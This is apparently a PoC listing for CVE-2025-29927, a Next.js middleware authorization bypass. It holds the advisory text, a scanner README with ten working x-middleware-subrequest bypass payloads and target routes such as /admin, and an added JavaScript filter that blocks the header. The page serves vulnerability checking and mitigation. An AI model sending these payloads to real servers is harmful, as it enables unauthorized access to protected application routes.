
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
This script checks for the CVE-2025-29927 vulnerability on Next.js servers by testing multiple payloads in the x-middleware-subrequest header to detect unauthorized access.
Readme
CVE-2025-29927 Checker

📌 Introduction

This script checks for the CVE-2025-29927 vulnerability in Next.js servers by testing multiple payloads in the x-middleware-subrequest header to detect unauthorized access.

❓ What is CVE-2025-29927?

CVE-2025-29927 is a vulnerability that allows security restrictions in Next.js to be bypassed, granting access to sensitive routes without authentication.

⚙️ How the Script Works

🔹 1. Importing Libraries

The script uses:

🛠️ argparse - for argument handling.

🌐 requests - to send HTTP requests.

⏳ time - for pauses between tests.

🎨 colorama - to format console output with colors.

🔹 2. Payload List

The script tests multiple payloads in x-middleware-subrequest, designed to bypass security restrictions. Example:

    "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
    "src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
    "middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
    "nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
    "src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
    "middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
    "middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
    "nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
    "src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
    "src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"

🔹 3. Sensitive Routes

The script analyzes responses for paths such as:

/admin, /dashboard, /settings, /private, /config

🔹 4. Scanning Process

✅ Displays a banner in the console.

✅ Sends HTTP requests with different payloads.

✅ Checks if the server uses Next.js.

✅ Detects access to sensitive routes and reports vulnerabilities.

🔹 5. Error Handling

The script handles exceptions to prevent interruptions due to connection failures.
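The advisory above names an interim mitigation for sites that cannot patch yet: stop external requests carrying x-middleware-subrequest from reaching the Next.js application. The following Node.js edge-side filter is an added example of that mitigation; it is not part of this scanner or of Next.js, and the function names and the constructed sample requests are assumptions made here. The second sample request reuses one of the header values listed in the payload section so the filter can be checked against exactly what the scanner sends.

```javascript
// Added defensive example (not from the scanner repository or Next.js):
// refuse, or optionally strip, the x-middleware-subrequest header on inbound
// requests before they are forwarded to a Next.js application.
const BLOCKED_HEADER = 'x-middleware-subrequest';

// Header names are case-insensitive on the wire, so compare lower-cased.
// Returns the header name as it appeared, or null when absent.
function findSubrequestHeader(headers) {
  const hit = Object.keys(headers).find((h) => h.toLowerCase() === BLOCKED_HEADER);
  return hit === undefined ? null : hit;
}

// Strip mode: copy of the headers with the blocked header removed.
function stripSubrequestHeader(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BLOCKED_HEADER) out[name] = value;
  }
  return out;
}

// Policy decision for one inbound request. 'block' (default) rejects the
// request with 403, which is the safer choice; 'strip' forwards it without
// the header, which keeps legitimate clients working if they sent it by mistake.
function filterRequest(headers, mode = 'block') {
  const hit = findSubrequestHeader(headers);
  if (hit === null) return { action: 'pass', headers };
  if (mode === 'strip') {
    return { action: 'pass', headers: stripSubrequestHeader(headers), stripped: hit };
  }
  return { action: 'block', status: 403, reason: `external request carried ${hit}` };
}

// Constructed sample requests (assumed values): a normal page load and a probe
// using one of the header values from the payload list above.
const SAMPLE_REQUESTS = [
  { path: '/dashboard', headers: { host: 'app.example', accept: 'text/html' } },
  { path: '/admin', headers: { host: 'app.example',
    'X-Middleware-Subrequest': 'nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware' } },
];

// Runs the filter over the samples and returns the per-request decisions.
function runSamples(mode = 'block') {
  return SAMPLE_REQUESTS.map((r) => ({ path: r.path, ...filterRequest(r.headers, mode) }));
}
```

In block mode the probe for /admin is answered with 403 at the edge and never reaches Next.js; a request without the header passes through unchanged.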

🚀 Usage Example

Run the script with:

python script.py -t https://example.com/api/auth

📢 Disclaimer

This tool is for ethical testing and authorized use only. Unauthorized use against third-party systems is illegal.


File Snapshot

[4.0K] /data/pocs/3c3fadb81e638452a2222bd830de8042ca55a996
├── [3.3K] CVE-2025-29927_Scanner.py
├── [ 60K] demo_localhost.png
├── [ 20K] demo_real.png
└── [4.7K] README.md

0 directories, 4 files